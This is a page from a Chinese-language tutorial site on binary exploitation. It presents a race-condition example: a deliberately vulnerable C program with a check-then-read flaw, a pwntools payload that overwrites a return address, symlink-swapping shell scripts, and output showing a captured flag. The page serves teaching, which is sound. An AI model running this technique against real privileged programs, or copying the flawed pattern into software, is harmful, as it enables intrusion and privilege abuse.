



<!DOCTYPE html>
<html lang="zh" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <meta http-equiv="x-ua-compatible" content="ie=edge">
      
      
      
      
        <meta name="lang:clipboard.copy" content="复制">
      
        <meta name="lang:clipboard.copied" content="已复制">
      
        <meta name="lang:search.language" content="jp">
      
        <meta name="lang:search.pipeline.stopwords" content="True">
      
        <meta name="lang:search.pipeline.trimmer" content="True">
      
        <meta name="lang:search.result.none" content="没有找到符合条件的结果">
      
        <meta name="lang:search.result.one" content="找到 1 个符合条件的结果">
      
        <meta name="lang:search.result.other" content="# 个符合条件的结果">
      
        <meta name="lang:search.tokenizer" content="[\uff0c\u3002]+">
      
      <link rel="shortcut icon" href="../../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-0.17.2, mkdocs-material-2.6.6">
    
    
      
        <title>例题 - 二进制漏洞挖掘与利用</title>
      
    
    
      <link rel="stylesheet" href="../../../assets/stylesheets/application.78aab2dc.css">
      
        <link rel="stylesheet" href="../../../assets/stylesheets/application-palette.6079476c.css">
      
    
    
      <script src="../../../assets/javascripts/modernizr.1aa3b519.js"></script>
    
    
      <link href="https://fonts.gstatic.com" rel="preconnect" crossorigin>
      
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Fira+Sans:300,400,400i,700|Fira+Mono">
        <style>body,input{font-family:"Fira Sans","Helvetica Neue",Helvetica,Arial,sans-serif}code,kbd,pre{font-family:"Fira Mono","Courier New",Courier,monospace}</style>
      
      <link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons">
    
    
      <link rel="stylesheet" href="../../../_static/css/extra.css">
    
    
  </head>
  
    
    
    <body dir="ltr" data-md-color-primary="white" data-md-color-accent="red">
  
    <svg class="md-svg">
      <defs>
        
        
      </defs>
    </svg>
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="drawer">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="search">
    <label class="md-overlay" data-md-component="overlay" for="drawer"></label>
    
      <a href="#_1" tabindex="1" class="md-skip">
        跳转至
      </a>
    
    
      <header class="md-header" data-md-component="header">
  <nav class="md-header-nav md-grid">
    <div class="md-flex">
      <div class="md-flex__cell md-flex__cell--shrink">
        <a href="../../.." title="二进制漏洞挖掘与利用" class="md-header-nav__button md-logo">
          
            <i class="md-icon">school</i>
          
        </a>
      </div>
      <div class="md-flex__cell md-flex__cell--shrink">
        <label class="md-icon md-icon--menu md-header-nav__button" for="drawer"></label>
      </div>
      <div class="md-flex__cell md-flex__cell--stretch">
        <div class="md-flex__ellipsis md-header-nav__title" data-md-component="title">
          
            
              <span class="md-header-nav__topic">
                二进制漏洞挖掘与利用
              </span>
              <span class="md-header-nav__topic">
                例题
              </span>
            
          
        </div>
      </div>
      <div class="md-flex__cell md-flex__cell--shrink">
        
          
            <label class="md-icon md-icon--search md-header-nav__button" for="search"></label>
            
<div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" placeholder="搜索" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="query" data-md-state="active">
      <label class="md-icon md-search__icon" for="search"></label>
      <button type="reset" class="md-icon md-search__icon" data-md-component="reset" tabindex="-1">
        &#xE5CD;
      </button>
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="result">
          <div class="md-search-result__meta">
            键入以开始搜索
          </div>
          <ol class="md-search-result__list"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
          
        
      </div>
      
    </div>
  </nav>
</header>
    
    <div class="md-container">
      
        
      
      
        

  

<nav class="md-tabs md-tabs--active" data-md-component="tabs">
  <div class="md-tabs__inner md-grid">
    <ul class="md-tabs__list">
      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../../.." title="简介" class="md-tabs__link">
          简介
        </a>
      
    </li>
  

      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../../stackoverflow/stack_intro/" title="栈溢出" class="md-tabs__link">
          栈溢出
        </a>
      
    </li>
  

      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../../fmtstr/fmtstr_intro/" title="格式化字符串漏洞" class="md-tabs__link">
          格式化字符串漏洞
        </a>
      
    </li>
  

      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../../heap/introduction/" title="堆利用" class="md-tabs__link">
          堆利用
        </a>
      
    </li>
  

      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../../io_file/introduction/" title="IO_FILE 利用" class="md-tabs__link">
          IO_FILE 利用
        </a>
      
    </li>
  

      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../introduction/" title="条件竞争" class="md-tabs__link md-tabs__link--active">
          条件竞争
        </a>
      
    </li>
  

      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../../lab/6.1.1_pwn_hctf2016_brop/" title="练习" class="md-tabs__link">
          练习
        </a>
      
    </li>
  

      
    </ul>
  </div>
</nav>
      
      <main class="md-main">
        <div class="md-main__inner md-grid" data-md-component="container">
          
            
              <div class="md-sidebar md-sidebar--primary" data-md-component="navigation">
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    <nav class="md-nav md-nav--primary" data-md-level="0">
  <label class="md-nav__title md-nav__title--site" for="drawer">
    <span class="md-nav__button md-logo">
      
        <i class="md-icon">school</i>
      
    </span>
    二进制漏洞挖掘与利用
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-1" type="checkbox" id="nav-1">
    
    <label class="md-nav__link" for="nav-1">
      简介
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-1">
        简介
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../../.." title="简介" class="md-nav__link">
      简介
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-2" type="checkbox" id="nav-2">
    
    <label class="md-nav__link" for="nav-2">
      栈溢出
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-2">
        栈溢出
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../../stackoverflow/stack_intro/" title="栈介绍" class="md-nav__link">
      栈介绍
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../stackoverflow/stackoverflow_basic/" title="栈溢出原理" class="md-nav__link">
      栈溢出原理
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../stackoverflow/basic_rop/" title="基本 ROP" class="md-nav__link">
      基本 ROP
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../stackoverflow/others/" title="花式栈溢出技巧" class="md-nav__link">
      花式栈溢出技巧
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../stackoverflow/medium_rop/" title="中级 ROP" class="md-nav__link">
      中级 ROP
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../stackoverflow/advanced_rop/" title="高级 ROP" class="md-nav__link">
      高级 ROP
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-3" type="checkbox" id="nav-3">
    
    <label class="md-nav__link" for="nav-3">
      格式化字符串漏洞
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-3">
        格式化字符串漏洞
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../../fmtstr/fmtstr_intro/" title="格式化字符串漏洞原理介绍" class="md-nav__link">
      格式化字符串漏洞原理介绍
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../fmtstr/fmtstr_exploit/" title="格式化字符串漏洞利用" class="md-nav__link">
      格式化字符串漏洞利用
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../fmtstr/fmtstr_example/" title="格式化字符串漏洞例子" class="md-nav__link">
      格式化字符串漏洞例子
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../fmtstr/fmtstr_detect/" title="格式化字符串漏洞检测" class="md-nav__link">
      格式化字符串漏洞检测
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-3-5" type="checkbox" id="nav-3-5">
    
    <label class="md-nav__link" for="nav-3-5">
      实验
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="2">
      <label class="md-nav__title" for="nav-3-5">
        实验
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../../fmtstr/example/picoctf-2014-guess/Write-up_cn/" title="picoctf-2014 guess" class="md-nav__link">
      picoctf-2014 guess
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-4" type="checkbox" id="nav-4">
    
    <label class="md-nav__link" for="nav-4">
      堆利用
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-4">
        堆利用
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/introduction/" title="堆利用简介" class="md-nav__link">
      堆利用简介
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/heap_overview/" title="堆概述" class="md-nav__link">
      堆概述
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/heap_structure/" title="堆相关数据结构" class="md-nav__link">
      堆相关数据结构
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/heap_implementation_details/" title="深入理解堆的实现" class="md-nav__link">
      深入理解堆的实现
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/heapoverflow_basic/" title="堆溢出" class="md-nav__link">
      堆溢出
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/off_by_one/" title="堆中的 Off-By-One" class="md-nav__link">
      堆中的 Off-By-One
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/unlink/" title="Unlink" class="md-nav__link">
      Unlink
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/use_after_free/" title="Use After Free" class="md-nav__link">
      Use After Free
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/fastbin_attack/" title="Fastbin Attack" class="md-nav__link">
      Fastbin Attack
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/chunk_extend_shrink/" title="Chunk Extend / Shrink" class="md-nav__link">
      Chunk Extend / Shrink
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/house_of_einherjar/" title="House Of Einherjar" class="md-nav__link">
      House Of Einherjar
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/house_of_lore/" title="House of Lore" class="md-nav__link">
      House of Lore
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/house_of_force/" title="House Of Force" class="md-nav__link">
      House Of Force
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/unsorted_bin_attack/" title="Unsorted Bin Attack" class="md-nav__link">
      Unsorted Bin Attack
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../heap/house_of_orange/" title="House of Orange" class="md-nav__link">
      House of Orange
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-5" type="checkbox" id="nav-5">
    
    <label class="md-nav__link" for="nav-5">
      IO_FILE 利用
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-5">
        IO_FILE 利用
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../../io_file/introduction/" title="FILE 文件结构介绍" class="md-nav__link">
      FILE 文件结构介绍
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../io_file/fake-vtable-exploit/" title="伪造 vtable 劫持程序流程" class="md-nav__link">
      伪造 vtable 劫持程序流程
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../io_file/fsop/" title="FSOP" class="md-nav__link">
      FSOP
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../io_file/exploit-in-libc2.24/" title="新版本 libc 下 IO_FILE 的利用" class="md-nav__link">
      新版本 libc 下 IO_FILE 的利用
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      

  


  <li class="md-nav__item md-nav__item--active md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-6" type="checkbox" id="nav-6" checked>
    
    <label class="md-nav__link" for="nav-6">
      条件竞争
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-6">
        条件竞争
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../introduction/" title="条件竞争介绍" class="md-nav__link">
      条件竞争介绍
    </a>
  </li>

        
          
          
          

  


  <li class="md-nav__item md-nav__item--active">
    
    <input class="md-toggle md-nav__toggle" data-md-toggle="toc" type="checkbox" id="toc">
    
      
    
    
      <label class="md-nav__link md-nav__link--active" for="toc">
        例题
      </label>
    
    <a href="./" title="例题" class="md-nav__link md-nav__link--active">
      例题
    </a>
    
      
<nav class="md-nav md-nav--secondary">
  
  
    
  
  
    <label class="md-nav__title" for="toc">目录</label>
    <ul class="md-nav__list" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#_2" title="构造例子" class="md-nav__link">
    构造例子
  </a>
  
    <nav class="md-nav">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#_3" title="源代码" class="md-nav__link">
    源代码
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#_4" title="分析" class="md-nav__link">
    分析
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#_5" title="基本思路" class="md-nav__link">
    基本思路
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#_6" title="具体效果" class="md-nav__link">
    具体效果
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
      
      
      
      
    </ul>
  
</nav>
    
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-7" type="checkbox" id="nav-7">
    
    <label class="md-nav__link" for="nav-7">
      练习
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-7">
        练习
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../../lab/6.1.1_pwn_hctf2016_brop/" title="HCTF2016 brop" class="md-nav__link">
      HCTF2016 brop
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../lab/6.1.2_pwn_njctf2017_pingme/" title="NJCTF2017 pingme" class="md-nav__link">
      NJCTF2017 pingme
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../lab/6.1.3_pwn_xdctf2015_pwn200/" title="XDCTF2015 pwn200" class="md-nav__link">
      XDCTF2015 pwn200
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../lab/6.1.4_pwn_backdoorctf2017_fun_signals/" title="BackdoorCTF2017 Fun-Signals" class="md-nav__link">
      BackdoorCTF2017 Fun-Signals
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../lab/6.1.5_pwn_grehackctf2017_beerfighter/" title="GreHackCTF2017 beerfighter" class="md-nav__link">
      GreHackCTF2017 beerfighter
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../lab/6.1.6_pwn_defconctf2015_fuckup/" title="DefconCTF2015 fuckup" class="md-nav__link">
      DefconCTF2015 fuckup
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../lab/6.1.7_pwn_0ctf2015_freenote/" title="0CTF2015 freenote" class="md-nav__link">
      0CTF2015 freenote
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../lab/6.1.8_pwn_dctf2017_flex/" title="DCTF2017 Flex" class="md-nav__link">
      DCTF2017 Flex
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../lab/6.1.9_rhme3_exploitation/" title="RHme3 Exploitation" class="md-nav__link">
      RHme3 Exploitation
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../lab/6.1.10_0ctf2017_babyheap2017/" title="0CTF2017 BabyHeap2017" class="md-nav__link">
      0CTF2017 BabyHeap2017
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../../lab/6.1.11_9447ctf2015_search_engine/" title="9447CTF2015 Search-Engine" class="md-nav__link">
      9447CTF2015 Search-Engine
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              <div class="md-sidebar md-sidebar--secondary" data-md-component="toc">
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    
<nav class="md-nav md-nav--secondary">
  
  
    
  
  
    <label class="md-nav__title" for="toc">目录</label>
    <ul class="md-nav__list" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#_2" title="构造例子" class="md-nav__link">
    构造例子
  </a>
  
    <nav class="md-nav">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#_3" title="源代码" class="md-nav__link">
    源代码
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#_4" title="分析" class="md-nav__link">
    分析
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#_5" title="基本思路" class="md-nav__link">
    基本思路
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#_6" title="具体效果" class="md-nav__link">
    具体效果
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
      
      
      
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          <div class="md-content">
            <article class="md-content__inner md-typeset">
              
                
                
                <h1 id="_1">题目<a class="headerlink" href="#_1" title="Permanent link">&para;</a></h1>
<h2 id="_2">构造例子<a class="headerlink" href="#_2" title="Permanent link">&para;</a></h2>
<h3 id="_3">源代码<a class="headerlink" href="#_3" title="Permanent link">&para;</a></h3>
<p>源代码如下</p>
<div class="codehilite"><pre><span></span><span class="cp">#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp"></span>
<span class="kt">void</span> <span class="nf">showflag</span><span class="p">()</span> <span class="p">{</span> <span class="n">system</span><span class="p">(</span><span class="s">&quot;cat flag&quot;</span><span class="p">);</span> <span class="p">}</span>
<span class="kt">void</span> <span class="nf">vuln</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">)</span> <span class="p">{</span>
  <span class="kt">int</span> <span class="n">number</span><span class="p">;</span>
  <span class="kt">int</span> <span class="n">index</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">perror</span><span class="p">(</span><span class="s">&quot;open file failed!!&quot;</span><span class="p">);</span>
    <span class="k">return</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">number</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">buf</span> <span class="o">+</span> <span class="n">index</span><span class="p">,</span> <span class="mi">128</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">number</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">break</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="n">index</span> <span class="o">+=</span> <span class="n">number</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="n">buf</span><span class="p">[</span><span class="n">index</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="sc">&#39;\x00&#39;</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">check</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">file</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">struct</span> <span class="n">stat</span> <span class="n">tmp</span><span class="p">;</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="s">&quot;flag&quot;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">&quot;file can not be flag!!&quot;</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="n">stat</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">tmp</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">tmp</span><span class="p">.</span><span class="n">st_size</span> <span class="o">&gt;</span> <span class="mi">255</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">&quot;file size is too large!!&quot;</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
  <span class="p">}</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[</span><span class="n">argc</span><span class="p">])</span> <span class="p">{</span>
  <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">==</span> <span class="mi">2</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">check</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
    <span class="n">vuln</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">buf</span><span class="p">);</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">&quot;Usage ./prog &lt;filename&gt;&quot;</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>

<h3 id="_4">分析<a class="headerlink" href="#_4" title="Permanent link">&para;</a></h3>
<p>可以看出程序的基本流程如下</p>
<ul>
<li>检查传入的命令行参数是不是 “flag”，如果是的话，就退出。</li>
<li>检查传入的命令行参数对应的文件大小是否大于 255，是的话，就直接退出。</li>
<li>将命令行参数所对应的文件内容读入到 buf 中 ，buf 的大小为 256。</li>
</ul>
<p>看似我们检查了文件的大小，同时 buf 的大小也可以满足对应的最大大小，但是这里存在一个条件竞争的问题。</p>
<p>如果我们在程序检查完对应的文件大小后，将对应的文件删除，并符号链接到另外一个更大的文件，那么程序所读入的内容就会更多，从而就会产生栈溢出。</p>
<h3 id="_5">基本思路<a class="headerlink" href="#_5" title="Permanent link">&para;</a></h3>
<p>那么，基本思路来了，我们是想要获得对应的<code>flag</code>的内容。那么我们只要通过栈溢出修改对应的<code>main</code>函数的返回地址即可，通过反汇编以及调试可以获得<code>showflag</code>的地址，获得对应的payload</p>
<div class="codehilite"><pre><span></span><span class="err">➜</span>  <span class="n">racetest</span> <span class="n">cat</span> <span class="n">payload</span><span class="o">.</span><span class="n">py</span> 
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">test</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;./test&#39;</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">=</span> <span class="s1">&#39;a&#39;</span> <span class="o">*</span> <span class="mh">0x100</span> <span class="o">+</span> <span class="s1">&#39;b&#39;</span> <span class="o">*</span> <span class="mi">8</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">test</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s1">&#39;showflag&#39;</span><span class="p">])</span>
<span class="nb">open</span><span class="p">(</span><span class="s1">&#39;big&#39;</span><span class="p">,</span> <span class="s1">&#39;w&#39;</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
</pre></div>

<p>对应两个条件竞争的脚本为</p>
<div class="codehilite"><pre><span></span>➜  racetest cat exp.sh    
<span class="c1">#!/bin/sh</span>
<span class="k">for</span> i in <span class="sb">`</span>seq <span class="m">500</span><span class="sb">`</span>
<span class="k">do</span>
    cp small fake
    sleep <span class="m">0</span>.000008
    rm fake
    ln -s big fake
    rm fake
<span class="k">done</span>
➜  racetest cat run.sh 
<span class="c1">#!/bin/sh</span>
<span class="k">for</span> i in <span class="sb">`</span>seq <span class="m">1000</span><span class="sb">`</span>
<span class="k">do</span>
    ./test fake
<span class="k">done</span>
</pre></div>

<p>其中 exp 用于来竞争在相应的窗口内删除 fake 文件，同时执行符号链接。run 用来执行程序。</p>
<h3 id="_6">具体效果<a class="headerlink" href="#_6" title="Permanent link">&para;</a></h3>
<div class="codehilite"><pre><span></span>➜  racetest <span class="o">(</span>sh exp.sh <span class="p">&amp;</span><span class="o">)</span> <span class="o">&amp;&amp;</span> sh run.sh
<span class="o">[</span>...<span class="o">]</span>
file size is too large!!
open file failed!!: No such file or directory
open file failed!!: No such file or directory
open file failed!!: No such file or directory
open file failed!!: No such file or directory
file size is too large!!
open file failed!!: No such file or directory
open file failed!!: No such file or directory
flag<span class="o">{</span>race_condition_succeed!<span class="o">}</span>
<span class="o">[</span>...<span class="o">]</span>
</pre></div>

<p>其中成功的关键在于对应的 <code>sleep</code> 的时间选择。</p>
<h1 id="_7">参考<a class="headerlink" href="#_7" title="Permanent link">&para;</a></h1>
<ul>
<li><a href="http://www.cnblogs.com/biyeymyhjob/archive/2012/07/20/2601655.html">http://www.cnblogs.com/biyeymyhjob/archive/2012/07/20/2601655.html</a></li>
<li><a href="http://www.cnblogs.com/huxiao-tee/p/4660352.html">http://www.cnblogs.com/huxiao-tee/p/4660352.html</a></li>
<li><a href="https://github.com/dirtycow/dirtycow.github.io">https://github.com/dirtycow/dirtycow.github.io</a></li>
</ul>
                
                  
                
              
              
                
              
            </article>
          </div>
        </div>
      </main>
      
        
<footer class="md-footer">
  
    <div class="md-footer-nav">
      <nav class="md-footer-nav__inner md-grid">
        
          <a href="../introduction/" title="条件竞争介绍" class="md-flex md-footer-nav__link md-footer-nav__link--prev" rel="prev">
            <div class="md-flex__cell md-flex__cell--shrink">
              <i class="md-icon md-icon--arrow-back md-footer-nav__button"></i>
            </div>
            <div class="md-flex__cell md-flex__cell--stretch md-footer-nav__title">
              <span class="md-flex__ellipsis">
                <span class="md-footer-nav__direction">
                  后退
                </span>
                条件竞争介绍
              </span>
            </div>
          </a>
        
        
          <a href="../../lab/6.1.1_pwn_hctf2016_brop/" title="HCTF2016 brop" class="md-flex md-footer-nav__link md-footer-nav__link--next" rel="next">
            <div class="md-flex__cell md-flex__cell--stretch md-footer-nav__title">
              <span class="md-flex__ellipsis">
                <span class="md-footer-nav__direction">
                  前进
                </span>
                HCTF2016 brop
              </span>
            </div>
            <div class="md-flex__cell md-flex__cell--shrink">
              <i class="md-icon md-icon--arrow-forward md-footer-nav__button"></i>
            </div>
          </a>
        
      </nav>
    </div>
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-footer-copyright">
        
        powered by
        <a href="http://www.mkdocs.org">MkDocs</a>
        and
        <a href="https://squidfunk.github.io/mkdocs-material/">
          Material for MkDocs</a>
      </div>
      
        
      
    </div>
  </div>
</footer>
      
    </div>
    
      <script src="../../../assets/javascripts/application.02434462.js"></script>
      
        
        
          
